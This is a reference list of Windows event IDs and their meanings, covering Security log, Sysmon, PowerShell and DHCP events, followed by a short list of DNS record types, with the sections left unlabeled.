Windows Event IDs reference

1100

The event logging service has shut down

1102

The audit log was cleared

4608

Windows is starting up

4609

Windows is shutting down

4616

The system time was changed

4624

An account was successfully logged on

4625

An account failed to log on

4634

An account was logged off

4647

User initiated logoff

4648

A logon was attempted using explicit credentials

4656

A handle to an object was requested

4657

A registry value was modified

4660

An object was deleted

4663

An attempt was made to access an object

4672

Special privileges assigned to new logon

4673

A privileged service was called

4688

A new process has been created

4689

A process has exited

4697

A service was installed in the system

4698

A scheduled task was created

4699

A scheduled task was deleted

4700

A scheduled task was enabled

4701

A scheduled task was disabled

4702

A scheduled task was updated

4719

System audit policy was changed

4720

A user account was created

4722

A user account was enabled

4723

An attempt was made to change an account's password

4724

An attempt was made to reset an accounts password

4725

A user account was disabled

4726

A user account was deleted

4732

A member was added to a security-enabled local group

4733

A member was removed from a security-enabled local group

4738

A user account was changed

4740

A user account was locked out

4767

A user account was unlocked

4768

A Kerberos authentication ticket (TGT) was requested

4769

A Kerberos service ticket was requested

4771

Kerberos pre-authentication failed

4776

The domain controller attempted to validate the credentials for an account

4778

A session was reconnected to a Window Station

4779

A session was disconnected from a Window Station

4798

A user's local group membership was enumerated

4800

The workstation was locked

4801

The workstation was unlocked

4825

A user was denied the access to Remote Desktop

5140

A network share object was accessed

5145

A network share object was checked to see whether client can be granted desired access

1

Process creation

2

File creation time changed

3

Network connection detected

4

Sysmon service state changed

5

Process terminated

6

Driver loaded

7

Image loaded (DLL)

8

CreateRemoteThread detected

9

RawAccessRead detected

10

Process accessed

11

File created

12

Registry object added or deleted

13

Registry value set

14

Registry object renamed

15

File stream created

16

Sysmon configuration state changed

17

Pipe created

18

Pipe connected

19

WMI event filter activity detected

20

WMI event consumer activity detected

21

WMI event consumer to filter activity detected

22

DNS query executed

23

File deleted

24

Clipboard changed

25

Process tampering detected

26

File delete logged

255

Error report

400

Engine state changed to available

403

Engine state changed to stopped

600

Provider lifecycle event

4100

Error record

4103

Module logging (command execution)

4104

Script block logging

10

A new IP address was leased to a client

11

A lease was renewed by a client

12

A lease was released by a client

13

An IP address was found to be in use on the network

14

A lease request could not be satisfied because the scope's address pool was exhausted

15

A lease was denied

16

A lease was deleted

17

A lease expired (DNS records not deleted)

18

A lease expired (DNS records deleted)

30

DNS update request sent

31

DNS update failed

32

DNS update successful

A

IPv4 address record

AAAA

IPv6 address record

CNAME

Canonical name (alias) record

MX

Mail exchange record

NS

Name server record

PTR

Pointer record (reverse lookup)

SOA

Start of authority record

SRV

Service locator record

TXT

Text record